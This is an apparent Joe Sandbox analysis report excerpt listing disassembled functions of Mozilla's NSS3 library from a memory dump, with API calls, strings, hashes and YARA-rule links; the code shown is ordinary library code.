PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6CAD8F3F

Part of subcall function 6CADA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6CADA421,00000000,00000000,6CAD9826), ref: 6CADA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAD904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6CAD8E76

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 2f2c8128d99c9a34a372b6001ee1ca9a55c406355014e29f7525ba5d87486406
Instruction ID: b768a4f4ae6242709c733e7c59dd114331044f1fd7dffd3ec8aa98d17f1cf2e7
Opcode Fuzzy Hash: 2f2c8128d99c9a34a372b6001ee1ca9a55c406355014e29f7525ba5d87486406
Instruction Fuzzy Hash: BD618DB5D002469BDB10CF65DD80AAEB7B9FF88358F194128DC18A7700EB35F955CAE1

Function 6CA88E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA88E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CA88E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CA88EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CBB18D0,?), ref: 6CA88F03
PR_CallOnce.NSS3(6CBE2AA4,6CAE12D0), ref: 6CA88F19
PL_FreeArenaPool.NSS3(?), ref: 6CA88F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA88F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA88F65
PL_FinishArenaPool.NSS3(?), ref: 6CA88FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6CA88FFE
PR_CallOnce.NSS3(6CBE2AA4,6CAE12D0), ref: 6CA89012
PL_FreeArenaPool.NSS3(?), ref: 6CA89024
PL_FinishArenaPool.NSS3(?), ref: 6CA8902C
PORT_DestroyCheapArena.NSS3(?), ref: 6CA8903E

Strings

security, xrefs: 6CA88EE7

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: aed1a690e56ba8feea8874f80c0bb9d8cefc64c2abfa01d7498b64acc5d97612
Instruction ID: 81e9ea89d119396ab08b5661f8d4d75a75f04d568c8639090e67d3f2fd7bb975
Opcode Fuzzy Hash: aed1a690e56ba8feea8874f80c0bb9d8cefc64c2abfa01d7498b64acc5d97612
Instruction Fuzzy Hash: DF5138B1509340ABE7109A589D41BBF73B8AF8975CF48082EF54497B40EB31D988D7A3

Function 6CAB4E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6CAB4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB4EC7

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CAB4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6CAB4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CAB4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CAB4F68

Strings

C_GetAttributeValue, xrefs: 6CAB4E7E
hObject = 0x%x, xrefs: 6CAB4EF5, 6CAB4F05
pTemplate = 0x%p, xrefs: 6CAB4F4A
ulCount = %d, xrefs: 6CAB4F63
(CK_INVALID_HANDLE), xrefs: 6CAB4EC0, 6CAB4F13
hSession = 0x%x, xrefs: 6CAB4EA2, 6CAB4EB2

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: 9b48103c4b6bedf212d785116b5944c9122d03afb49e0e9dcf94cc09c51d193d
Instruction ID: bdcf43dc516002e83d76b8da9a7067213b6e9b6b80ee0446492a6086bcb4c0a9
Opcode Fuzzy Hash: 9b48103c4b6bedf212d785116b5944c9122d03afb49e0e9dcf94cc09c51d193d
Instruction Fuzzy Hash: 6C41F635641184ABDB00DF68ED48F9E77B9EB46B5DF088024F50867612DB309E8DCBA2

Function 6CAB4CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CAB4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB4D37

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CAB4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6CAB4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CAB4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CAB4E20

Strings

C_GetObjectSize, xrefs: 6CAB4CEE
pulSize = 0x%p, xrefs: 6CAB4DB7
hObject = 0x%x, xrefs: 6CAB4D65, 6CAB4D75
*pulSize = 0x%x, xrefs: 6CAB4E1B
(CK_INVALID_HANDLE), xrefs: 6CAB4D30, 6CAB4D83
hSession = 0x%x, xrefs: 6CAB4D12, 6CAB4D22

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: 168698b24a3a0bca4ea8dda9c24ec421dbb471ac5111361be06d3633e8b9d3d9
Instruction ID: 9af0df4e8732264b99c131d5f0ac6b05eec0c3ce283fe04437c5e2b291bcba92
Opcode Fuzzy Hash: 168698b24a3a0bca4ea8dda9c24ec421dbb471ac5111361be06d3633e8b9d3d9
Instruction Fuzzy Hash: 3441E575600185AFDB409B54ED88F6E7779EB4AB5DF088024F908BB612DB309D9CCB63

Function 6CAB2F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6CAB2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB2F63

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6CAB2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6CAB2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6CAB2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6CAB2FE7

Strings

C_SetPIN, xrefs: 6CAB2F21
ulOldLen = %d, xrefs: 6CAB2FB0
pOldPin = 0x%p, xrefs: 6CAB2F95
ulNewLen = %d, xrefs: 6CAB2FE2
pNewPin = 0x%p, xrefs: 6CAB2FC9
(CK_INVALID_HANDLE), xrefs: 6CAB2F5C
hSession = 0x%x, xrefs: 6CAB2F3E, 6CAB2F4E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
API String ID: 1003633598-3716813897
Opcode ID: e5a3fabe1b354e247717a264cec46388dec19fef482dfd7bb238c426f55c2146
Instruction ID: d3373b28aa927d9ae102cf98bbd65c984b722a2062d7eab2acbd1e4e5a304180
Opcode Fuzzy Hash: e5a3fabe1b354e247717a264cec46388dec19fef482dfd7bb238c426f55c2146
Instruction Fuzzy Hash: 5A311639601185AFDB009F68ED4CE5E3B79EB4A759F084025F808B7611DF308998CB63

Function 6CABA9A0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageBegin), ref: 6CABA9C6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CABA9F4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CABAA03

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CABAA19
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6CABAA3A
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6CABAA55
PR_LogPrint.NSS3( pAssociatedData = 0x%p,?), ref: 6CABAA6E
PR_LogPrint.NSS3( ulAssociatedDataLen = 0x%p,?), ref: 6CABAA87

Strings

pParameter = 0x%p, xrefs: 6CABAA35
pAssociatedData = 0x%p, xrefs: 6CABAA69
C_DecryptMessageBegin, xrefs: 6CABA9C1
ulAssociatedDataLen = 0x%p, xrefs: 6CABAA82
(CK_INVALID_HANDLE), xrefs: 6CABA9FC
ulParameterLen = 0x%p, xrefs: 6CABAA50
hSession = 0x%x, xrefs: 6CABA9DE, 6CABA9EE

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pAssociatedData = 0x%p$ pParameter = 0x%p$ ulAssociatedDataLen = 0x%p$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptMessageBegin
API String ID: 1003633598-2188218412
Opcode ID: 99324121e8a4d4cbb985aee2d611deb57b293f194ed2962c9a0c9d8ea3de0bd7
Instruction ID: 0c46f8b11d2bdc665a3e2b39e0edbe910ca266c194153c74a07b726880d57a31
Opcode Fuzzy Hash: 99324121e8a4d4cbb985aee2d611deb57b293f194ed2962c9a0c9d8ea3de0bd7
Instruction Fuzzy Hash: D131D535601189AFDB04DF54EE48A9E3BBAEB4A759F084028F408A7611DB309D9CDB72

Function 6CB4CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB4CC7B), ref: 6CB4CD7A

Part of subcall function 6CB4CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CABC1A8,?), ref: 6CB4CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB4CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB4CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6CB4CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB4CD8E

Part of subcall function 6CA705C0: PR_EnterMonitor.NSS3 ref: 6CA705D1
Part of subcall function 6CA705C0: PR_ExitMonitor.NSS3 ref: 6CA705EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6CB4CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB4CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB4CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB4CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6CB4CE48

Strings

wship6.dll, xrefs: 6CB4CDE3
freeaddrinfo, xrefs: 6CB4CD9F, 6CB4CE10
ws2_32.dll, xrefs: 6CB4CD75
getnameinfo, xrefs: 6CB4CDB2, 6CB4CE23
getaddrinfo, xrefs: 6CB4CD88, 6CB4CDF9

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: b164fc1d76abae0c4b454125385f9a78a5cd90b43aa0ec210db6c7f0038a8bf3
Instruction ID: 63a4c12b7b1e9d6dab510a62e77b6b36484c15d081a2115c3bef435c4fc1445a
Opcode Fuzzy Hash: b164fc1d76abae0c4b454125385f9a78a5cd90b43aa0ec210db6c7f0038a8bf3
Instruction Fuzzy Hash: 131129AEE061A11AD710EB756C00DAB3858AB0295DF2C8534D805E2F05FF31D64C83F3

Function 6CAE6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6CBB1DE0,?), ref: 6CAE6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAE6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CAE6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6CAE6D82
DER_GetInteger_Util.NSS3(?), ref: 6CAE6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAE6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CAE6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CAE6F19
PK11_DigestBegin.NSS3(00000000), ref: 6CAE6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6CAE6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CAE7011
PK11_FreeSymKey.NSS3(00000000), ref: 6CAE7033
free.MOZGLUE(?), ref: 6CAE703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CAE7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CAE7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6CAE70AF

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: c4c89027b6673c910beafe6cfb198b515ca281939a3fc2e5485fe054c86a9f06
Instruction ID: 64ec7f82097e9078796425797d9229f0f31c58cc47c45d572cc0e05f245233cd
Opcode Fuzzy Hash: c4c89027b6673c910beafe6cfb198b515ca281939a3fc2e5485fe054c86a9f06
Instruction Fuzzy Hash: F0A117719042049BEB009B24DC95BAB32A5DB8930CF284D39EA59CBBC1E735D8C9D7D3

Function 6CAAAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CA8AB95,00000000,?,00000000,00000000,00000000), ref: 6CAAAF25
EnterCriticalSection.KERNEL32(?,?,?,?,6CA8AB95,00000000,?,00000000,00000000,00000000), ref: 6CAAAF39
PR_Unlock.NSS3(?,?,?,6CA8AB95,00000000,?,00000000,00000000,00000000), ref: 6CAAAF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CA8AB95,00000000,?,00000000,00000000,00000000), ref: 6CAAAF69
TlsGetValue.KERNEL32 ref: 6CAAB06B
EnterCriticalSection.KERNEL32(?), ref: 6CAAB083
PR_Unlock.NSS3(?), ref: 6CAAB0A4
TlsGetValue.KERNEL32 ref: 6CAAB0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6CAAB0D9
PR_Unlock.NSS3 ref: 6CAAB102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAAB151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAAB182

Part of subcall function 6CADFAB0: free.MOZGLUE(?,-00000001,?,?,6CA7F673,00000000,00000000), ref: 6CADFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CAAB177

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CA8AB95,00000000,?,00000000,00000000,00000000), ref: 6CAAB1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6CA8AB95,00000000,?,00000000,00000000,00000000), ref: 6CAAB1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CA8AB95,00000000,?,00000000,00000000,00000000), ref: 6CAAB1C2

Part of subcall function 6CAD1560: TlsGetValue.KERNEL32(00000000,?,6CAA0844,?), ref: 6CAD157A
Part of subcall function 6CAD1560: EnterCriticalSection.KERNEL32(?,?,?,6CAA0844,?), ref: 6CAD158F
Part of subcall function 6CAD1560: PR_Unlock.NSS3(?,?,?,?,6CAA0844,?), ref: 6CAD15B2

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 8cba04c7fc06dd27916d51d10faf1de516ba2a5242277174bb9e3247f742b218
Instruction ID: 8cd3e2b758e22f3b76b631cae013ec992b1ec0d7c9a428b81f4f14b6ac9f3442
Opcode Fuzzy Hash: 8cba04c7fc06dd27916d51d10faf1de516ba2a5242277174bb9e3247f742b218
Instruction Fuzzy Hash: A2A1A2B1D002099FEF009FA4ED41AEEB7B4EF09308F144125E90997752E731E99ACBE1

Function 6CB5A4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CB5A4E6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CB5A4F9
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB5A553
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CB5A5AC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB5A5F7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB5A60C
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB5A633
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB5A671
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6CB5A69A

Strings

database corruption, xrefs: 6CB5A627
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB5A61D, 6CB5A68B, 6CB5A6B3
%s at line %d of [%.10s], xrefs: 6CB5A62C

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2358773949-598938438
Opcode ID: 748f05a530a2fe102cce068a8be81cb173fae8c818712d05a75d02ae004bab4f
Instruction ID: 3b1b8c1b43e74850868db46e2ccf3cd0ca641854fb13756f981e383e17a46ebf
Opcode Fuzzy Hash: 748f05a530a2fe102cce068a8be81cb173fae8c818712d05a75d02ae004bab4f
Instruction Fuzzy Hash: E851B4B1908380EBDB019F25D890A6E7BE4EF44318F444839F84967681E771DD94CFA3

Function 6CAFAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAFADB1

Part of subcall function 6CADBE30: SECOID_FindOID_Util.NSS3(6CA9311B,00000000,?,6CA9311B,?), ref: 6CADBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CAFADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CAFAE08

Part of subcall function 6CADB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBB18D0,?), ref: 6CADB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAFAE25
PL_FreeArenaPool.NSS3 ref: 6CAFAE63
PR_CallOnce.NSS3(6CBE2AA4,6CAE12D0), ref: 6CAFAE4D

Part of subcall function 6CA04C70: TlsGetValue.KERNEL32(?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04C97
Part of subcall function 6CA04C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04CB0
